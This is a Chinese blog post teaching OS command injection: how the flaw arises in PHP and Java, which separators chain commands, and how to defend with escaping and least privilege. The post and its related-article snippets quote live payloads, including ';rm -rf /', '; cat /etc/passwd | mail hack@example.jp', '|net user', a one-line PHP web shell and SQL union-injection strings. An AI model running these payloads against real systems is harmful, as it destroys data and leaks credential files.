注入进阶之OS命令行注入

最新推荐文章于 2025-10-29 08:42:16 发布
原创 最新推荐文章于 2025-10-29 08:42:16 发布 · 1.2w 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。


  1.os命令注入介绍

   OS指令执行是为了通过网络接口在web服务器执行OS命令的一种技术。如果应用程序使用外部输入的字符串或受外部影响的字符串组装命令,并且没有经过正确的过滤,就可能导致OS命令的注入攻击。

  2.类型

第一种类型是,应用程序执行一个自己控制的固定程序,通过用户输入的参数来执行命令。这时,可以通过参数的分隔符,在参数中注入命令,来执行攻击者想要运行的命令。


第二种类型是,应用程序将输入的整个字符串作为一个命令,应用程序只是做个中转,将命令传给操作系统执行,例如,通过exec来执行命令,这时可以通过命令分隔符注入命令。


  下面通过几个栗子让大家更好的理解下命令注入:


  1.通过参数注入

 下面是一段php代码,php提供了3个可以执行外部命令的函数:system( ),esec( ),passthru( ),同时php还提供了popen通过打开一个进程管道来执行给定的命令,但必须有权限才可以,下面的栗子是以system为例:

$username = $_POST[“user”];

$command = ‘ls -l /home/’.$username;

System($command);

如果用户名没有做输入验证,那么便可以搞点事情,比如输入的$username如下:

;rm -rf /

那么,$command的结果如下:

ls -l /home/;rm -rf /

由于分号在linux和unix系统下是命令的分隔符,系统首先会执行ls命令,然后执行rm命令,然后悲剧发生了,你的整个系统文件都会被删除了。


  另外,还有一个需要注意的地方就是,由两个反引号括起来作为一个表达式(’command‘和$(command)的含义相同),这个表达式的值就是这个命令执行的结果,下面举个栗子:

$test=’/bin/ls -l’;

echo ‘hello world’

‘.$test.’

?>

页面将显示/bin/ls -l的执行结果。


2.命令分隔符注入命令

  Java代码也提供一些接口,如Runtime.getRuntime().exec(“command”),System.exec(“command”),调用这两个命令,可以执行一些体统命令。下面给一段代码:

Public static void main(String command){

Runtime run = Runtime.getRuntime();

try{

Process process = run.exec(“cmd.exe /k start  ”+ command);

InputStream in = process.getInputStream();

While (in.read() != -1){

System.out.println(in.read());

}

in.close();

process.waitFor();

} catch (Exception e){

e.printStackTrace();

}

}

  在运行这些接口的时候也应该注意,如果command参数没有处理好,也很容易导致命令行注入。来个栗子:

如果执行的command命令如下:

echo “hello world”

如果输入的是:

echo “hello world”| dir

dir命令就会执行,并且会显示当前的目录结构。一般系统的命令分隔符有“;”,“&”,“&&”,“|”,“||”。

 

  通过以上栗子可以总结出,命令行注入可以使得没有授权的代码或者命令得到执行,比如,exit,restart,读文件和目录,读取应用数据,修改应用数据,修改应用数据,甚至于隐藏一些非法操作。


  当然我们也可以通过输入检查来避免命令行注入,对于“;”,重定向“>” / “<”以及空格这些有特殊的字符进行过滤。但是,使用黑名单往往也难以解决问题,因为还是可能有某些特殊字符还是会遗漏。即使没有遗漏,那么当我们需要输入这些特殊字符时,又该怎么处理呢?这里给出的解决方法就是“包围”+”转义”。当然,系统不同,包围和转义的规则也不一样。


   在Linux/UNIX中,可将给定的字符串用单引号括起来,为什么用单引号?因为在shell代码的转义字符中单引号是硬转义,会使单引号中所有shell的特殊字符失去原来的意义。


   在windows中,可以将给定的字符用双引号括起来,|,^,&等都是特殊字符。转义规则为:^^代表^,^|代表|,^”代表”,^&代表&。


   虽然通过转义的处理,可以预防命令行的注入的问题,但是,难免在编程中引入错误,导致问题的引入,因此需要注意以下几点,即使存在命令行注入,也要将损失降低到最低。


   1.不仅要在客户端过滤,也要在服务器端进行过滤。


   2.要用最小权限去运行程序,不要给予程序多余的权限,最好只允许在特定的路径下运行,可以通过明确的路径运行命令。

  3.在程序执行错误时不要显示与内部相关联的细节。


  4.如果只允许运行有限的命令,使用白名单方式过滤。


  5.对于需要运行命令的请求,尽可能减少外部数据的输入,比如,能传参数的就不要传命令行;web应用程 序,如果可以将一些数据保存在会话,就不要发给客户端。


  6.如果存在下载文件,可以分配文件一个id号,通过id号来访问,而不通过文件名访问。如果允许输入文件名,就需要严格检查文件名的合法性,避免可能的命令注入。

                                        

 

commix:自动化的多合一OS命令注入和利用工具
02-05
一般信息 Commix ([ comm ]和[ i ] jection e [ x ] ploiter的缩写)是由 ( )编写的自动化工具,可以从Web开发人员,渗透测试人员甚至安全研究人员处使用,以测试Web-基于应用程序的视图,以查找与攻击相关的错误,错误或漏洞。 通过使用此工具,很容易在某些易受攻击的参数或HTTP标头中查找和利用命令注入漏洞。 法律免责声明 对于每次混合运行,最终用户必须同意以下前言: (!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is
High级别的命令注入
qq_43592364的博客
05-19 589
漏洞:命令注入 打开火狐浏览器开启代理并进入DVWA靶场,将安全级别设置为High 选择Conmmand Injection模块,在Enter an IP address一栏注入命令:testcmdinjection|net user l testcmdinjection|net user 在包含注入命令数据提交后可根据回显结果是否包含执行命令结果特征进行判断是否存在注入命令漏洞,例如...
【Academy】OS 命令注入 ------ OS command injection
D-river博客
03-12 834
OS 命令注入也称为 shell 注入。它允许攻击者在运行应用程序的服务器上执行操作系统 (OS命令,并且通常会完全破坏应用程序及其数据。通常,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,并利用信任关系将攻击转向组织内的其他系统。
操作系统命令注入
最新发布
2501_93596454的博客
10-29 365
一:实验目标: 通过命令注入执行 whoami 命令,获取当前用户名。· 目标端点: /product/stock。# 应用程序后端代码示例(漏洞代码)· 确认请求为 POST 方法。3. 构造Payload。· 找到库存检查功能。
OS命令注入
m0_38066007的博客
09-16 871
OS命令注入和SQL注入差不多,只不过SQL注入是针对数据库的,而OS命令注入是针对操作系统的。OS命令注入攻击指通过Web应用,执行非法的操作系统命令达到攻击的目的。只要在能调用Shell函数的地方就有存在被攻击的风险。倘若调用Shell时存在疏漏,就可以执行插入的非法命令。 // 以 Node.js 为例,假如在接口中需要从 github 下载用户指定的 repo const exec = require('mz/child_process').exec; let params = {/* 用户.
【Web技术攻击】OS(Operating System)命令注入攻击
AC_greener的博客
05-06 2746
OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的OS注入攻击案例:以表单的发送功能为例,该功能可将用户的邮件按已填写的对方邮箱地址放过去。 攻击者将下面的值指定作为邮件地址: ; cat /etc/passwd | mail hack@example.jp 程序接收该值,构成以下的命令组合: “| /usr/sbin/sendmail ; cat /etc/passwd |
(八)OS命令注入
weixin_43047908的博客
04-13 1829
什么是OS命令注入? 操作系统命令注入(也称为外壳程序注入)是一个Web安全漏洞,它使攻击者可以在运行应用程序的服务器上执行任意操作系统(OS命令,并且通常会完全破坏该应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏托管基础结构的其他部分,利用信任关系将攻击转移到组织内的其他系统。 执行任意命令 考虑一个购物应用程序,该应用程序使用户可以查看特定商店中某商品是否有库存。可通过以下网址访问此信息: https://insecure-website.com/stockStatus?produc
命令行工具进阶之路:argparse与click构建专业CLI的8个高级用法
命令行工具(CLI)的设计远不止参数解析,其核心在于**用户意图的精准捕捉与系统行为的清晰表达**。优秀的CLI应遵循“约定优于配置”的原则,通过直观的命令结构降低认知成本。例如,`git` 的子命令设计(如 `git ...
嵌入式测试架构设计进阶之路(3大平台搭建秘籍首次公开)
[嵌入式测试架构设计进阶之路(3大平台搭建秘籍首次公开)](https://learn.microsoft.com/en-us/visualstudio/test/media/vs-2022/cpp-test-codelens-icons-2022.png?view=vs-2022) # 1. 嵌入式测试架构的核心理念与...
Joern高级配置与性能优化技巧:从新手到专家的进阶之路
[Joern高级配置与性能优化技巧:从新手到专家的进阶之路](https://lorexxar-blog.oss-cn-shanghai.aliyuncs.com/blog/202308221725399.png) # 摘要 Joern是一个广泛使用的开源代码分析工具,具备强大的静态分析和...
渗透测试-注入攻击专题
aming小老弟
03-11 4048
sql手工注入 @apache+php+Mysql 正则注入 0x01 Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union sele
Kali Linux进行SQL注入与XSS漏洞利用教程(非常详细)网络安全零基础入门必看教程!
wholeliubei的博客
09-30 902
本文介绍了Kali Linux进行SQL注入和XSS漏洞利用的实验过程。实验环境包括Kali Linux 2022.4和Windows 10主机。SQL注入部分使用sqlmap工具获取服务器信息、数据库名称、表结构及字段值;XSS漏洞利用部分通过安装beef-xss工具进行攻击测试。实验展示了从信息收集到数据提取的完整渗透测试流程,并提供了详细的操作命令和截图说明。
os命令注入
weixin_54252904的博客
04-17 241
system函数 system() 能够将字符串作为OS 命令执行,自带输出功能 <?php if(isset($_GET['cmd'])){ $str=$_GET['cmd']; system($str); } ?> 提交参数 ?cmd=ipconfig **exec()**函数 exec() 函数能将字符串作为OS命令执行,需要输出执行结果。测试代码如下 <?php if(isset($_GET['cmd'])){ $str=$_GET['cmd']; prin
命令注入(OS)
ZY95001的博客
09-19 1627
一、
浅谈OS命令注入漏洞(Shell注入漏洞)
Z614655003的博客
07-13 1587
浅谈OS命令注入漏洞(Shell注入漏洞)
【Academy】OS command injection 操作系统命令注入
D-river博客
06-20 1364
操作系统命令注入也称为shell注入。它允许攻击者在运行应用程序的服务器上执行操作系统(OS命令,通常会完全危及应用程序及其数据。通常,攻击者可以利用操作系统命令注入漏洞来危害托管基础架构的其他部分,并利用信任关系将攻击转移到组织内的其他系统。
OS命令注入】常见OS命令执行函数以及OS命令注入利用实例以及靶场实验—基于DVWA靶场
m0_64378913的博客
06-26 2732
背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件),当应用需要调用一些外部程序时就会用到一些系统命令的函数。OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。条件:漏洞危害:作用:该函数能够将字符串作为OS命令执行,自带输出功能。
命令行参数什么作用
07-04
<think>嗯,用户问的是命令行参数的作用,我需要结合编程和系统操作两方面来回答。从引用材料看,用户之前接触过Java、Go和Rust的命令行参数处理方式,说明ta可能是个开发者,需要实际应用场景的说明。 用户提供的三个引用很有价值:[1]提到IDEA如何输入命令行参数,[2]展示Go的os.Args基础用法,[3]则是Rust的env::args()实现。这些材料虽然零散,但正好能支撑我的回答框架。 命令行参数的核心作用其实是解决程序动态配置问题。比如运维人员写自动化脚本时,通过参数指定日志路径;开发者调试时传入不同标志位切换测试模式。这里要特别注意系统级差异:Windows习惯用/前缀,Unix系用-,但现代工具基本都支持GNU风格的双横杠长参数。 安全方面值得单独强调。用户可能没意识到,像数据库密码这类敏感信息通过参数传递会被ps命令捕获,生产环境必须用环境变量替代。这个点在引用材料里没提,但实际开发中很重要。 数学表达要谨慎处理。比如说明参数解析算法时,位置参数索引可以写成$args[0]$,但不需要复杂公式。用户给的示例都是基础用法,重点应该放在实用场景而非理论。 最后生成的问题要覆盖不同层次:新手可能想知道基本语法(问题1),进阶者关心安全规范(问题4),架构师则更关注设计模式(问题3)。这样能延续用户的学习路径。</think>命令行参数是程序启动时通过命令行界面传递的额外信息,在编程和系统操作中扮演着核心角色,其作用主要体现在以下方面: --- ### 一、核心作用解析 1. **动态配置程序行为** - 在不修改代码的前提下,通过外部输入控制程序逻辑 - 示例: ```bash # 指定配置文件路径 $ myapp --config=/etc/app.conf # 启用调试模式 $ compiler -debug -optimize=high ``` 2. **传递运行时数据** - 向程序注入初始数据或操作对象 - 示例(文件处理): ```bash $ image_processor input.jpg -resize 800x600 -output result.png ``` 3. **自动化脚本交互** - 在Shell脚本中实现程序间参数传递 - 示例(备份脚本): ```bash # 调用压缩工具并传递参数 tar -czvf backup_$(date +%F).tar.gz /data ``` --- ### 二、技术实现原理 根据引用材料,不同语言的处理方式: - **Go语言**(引用[2]): 通过`os.Args`切片获取参数,索引0为程序名 ```go fmt.Println(os.Args[1]) // 输出第一个参数 ``` - **Rust**(引用[3]): 使用`std::env::args()`返回迭代器 ```rust let args: Vec<String> = env::args().collect(); ``` - **Java**(引用[1]): 在IDE中配置运行参数(如IDEA的`Program arguments`) --- ### 三、系统操作中的关键应用 | 场景 | 示例命令 | 作用说明 | |---------------------|----------------------------|----------------------------| | 系统管理 | `shutdown /s /t 60` | 60秒后关机(Windows) | | 进程筛选 | `ps aux | grep nginx` | 查找nginx进程(Linux) | | 网络诊断 | `ping -c 4 example.com` | 发送4次ICMP包 | | 开发工具链 | `gcc -O2 -o main main.c` | 启用二级优化编译C程序 | --- ### 四、设计规范与安全实践 1. **参数解析标准** - 短参数:`-v`(单横杠单字母) - 长参数:`--verbose`(双横杠单词) - 带值参数:`--threads=4` 2. **安全注意事项** - 敏感信息(如密码)应通过环境变量传递而非命令行 - 需验证参数格式防止注入攻击 - 重要操作建议使用`--confirm`二次确认 > 数学表达示例:当解析$n$个参数时,参数索引范围是$[0, n-1]$,其中$args[0]$恒为程序名[^2][^3]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值